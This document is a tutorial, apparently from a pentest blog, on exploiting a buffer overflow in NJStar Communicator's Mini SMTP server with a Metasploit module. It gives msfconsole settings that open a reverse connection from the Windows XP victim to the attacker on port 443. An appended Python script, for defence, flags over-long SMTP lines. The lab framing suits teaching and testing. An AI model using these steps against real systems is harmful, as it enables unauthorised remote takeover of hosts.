Type : Tutorial
Level : Medium
Attacker O.S : Backtrack 5R1
Victim O.S : Windows XP SP3
Exploit Credit : Dillon Beresford
When I saw this exploit 2 weeks ago, I wondered why I had never heard of this software before. Inside China itself, the most popular software for writing Chinese characters was Sogou. Maybe it's because NJStar has an English version, so this software should be more popular with users outside China who are just starting to learn Chinese Hanzi characters.
This software also has a mini SMTP server for sending e-mail, so with just one click you can send an e-mail to any destination you want.
So how does the exploit work?
According to metasploit.com, this exploit targets minismtp.exe because it is the only NJStar component in memory, and its base starts with 0x00.
Requirements :
1. NJstar 300 Communicator Mini SMTP Server application (press CTRL + Click my affiliations box to view the download link below)
2. NJstar SMTP Exploit
Mediafire.com
Step by Step :
Attacker IP Address : 192.168.8.93
Victim IP Address : 192.168.8.94
1. Download the required files above (the application and the exploit).
- Install the vulnerable application on your Windows XP SP3 machine.
- Copy the NJStar SMTP Exploit to your attacker machine and put it in /pentest/exploits/framework/modules/exploits/windows/smtp/ (FYI : this location depends on where you installed your Metasploit framework, especially for Windows users)
2. Open your terminal (CTRL+ALT+T) and run the Metasploit console by typing msfconsole, then use the exploit we've just added and do not forget to specify the payload as well.
3. You can view the available switches by typing the show options command in your msfconsole. The picture below shows the switch configuration I used to make the exploit work.
Information :
msf exploit(njstar_smtp_bof) > set rhost 192.168.8.94 --> set the target IP address
rhost => 192.168.8.94
msf exploit(njstar_smtp_bof) > set lhost 192.168.8.93 --> set the attacker IP address to handle the connection when the exploit succeeds
lhost => 192.168.8.93
msf exploit(njstar_smtp_bof) > set lport 443 --> attacker local port to handle the connection
lport => 443
msf exploit(njstar_smtp_bof) > set target 0 --> set the target to Windows XP SP2/SP3
target => 0
4. When everything has been set up, check whether the exploit works by running the exploit command from your msfconsole.
Pwn3D!!
Countermeasures :
1. Update your NJStar Communicator to the latest version.
Hope it's useful
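A detection-side complement to the countermeasure above, added here as an example that is not part of the original post or of the Metasploit module: it scans a reassembled client-to-server SMTP byte stream for lines that break the RFC 5321 size limits, which is how an overflow attempt against a small SMTP server such as minismtp.exe would typically stand out. The post does not say which SMTP command or length triggers the bug, so the generic protocol limits are used as an assumption; the function name and the sample streams are constructed.

```python
# Added example: flag SMTP client lines that break RFC 5321 size limits.
CMD_LIMIT = 512    # RFC 5321 4.5.3.1.4: command line, CRLF included
TEXT_LIMIT = 1000  # RFC 5321 4.5.3.1.6: message text line, CRLF included

def scan_client_stream(stream: bytes):
    """Return findings for one reassembled client-to-server SMTP byte stream."""
    findings = []
    in_data = False                    # True between DATA and the lone "."
    lines = stream.split(b"\r\n")
    unterminated = lines.pop()         # bytes after the last CRLF (may be empty)
    for number, line in enumerate(lines, start=1):
        size = len(line) + 2           # count the CRLF we split on
        limit = TEXT_LIMIT if in_data else CMD_LIMIT
        reasons = []
        if size > limit:
            reasons.append(f"{size} octets exceeds limit {limit}")
        # Commands are plain ASCII here; relax this for SMTPUTF8 peers.
        if not in_data and any(b < 0x20 or b > 0x7E for b in line):
            reasons.append("non-printable bytes in command line")
        if reasons:
            findings.append({"line": number, "in_data": in_data, "reasons": reasons})
        if in_data:
            in_data = line != b"."     # a lone dot ends the message body
        elif line.strip().upper() == b"DATA":
            in_data = True
    # A sender that never terminates the line can still overrun a fixed buffer.
    limit = TEXT_LIMIT if in_data else CMD_LIMIT
    if len(unterminated) > limit:
        findings.append({"line": len(lines) + 1, "in_data": in_data, "reasons": [
            f"{len(unterminated)} unterminated octets exceeds limit {limit}"]})
    return findings

# Constructed sample streams (not captured traffic, not the exploit's request).
NORMAL = (b"EHLO client.example\r\nMAIL FROM:<a@example.com>\r\n"
          b"RCPT TO:<b@example.com>\r\nDATA\r\nSubject: hi\r\n\r\nhello\r\n.\r\nQUIT\r\n")
OVERLONG = b"EHLO client.example\r\n" + b"A" * 600 + b"\xff\xfe\r\nQUIT\r\n"
NO_CRLF = b"EHLO client.example\r\n" + b"B" * 2000

if __name__ == "__main__":
    for name, sample in (("normal", NORMAL), ("overlong", OVERLONG), ("no-crlf", NO_CRLF)):
        print(name, scan_client_stream(sample))
```

The same length check can be expressed as an IDS rule on TCP port 25 once the stream is reassembled; the script form makes it easy to run over exported sessions.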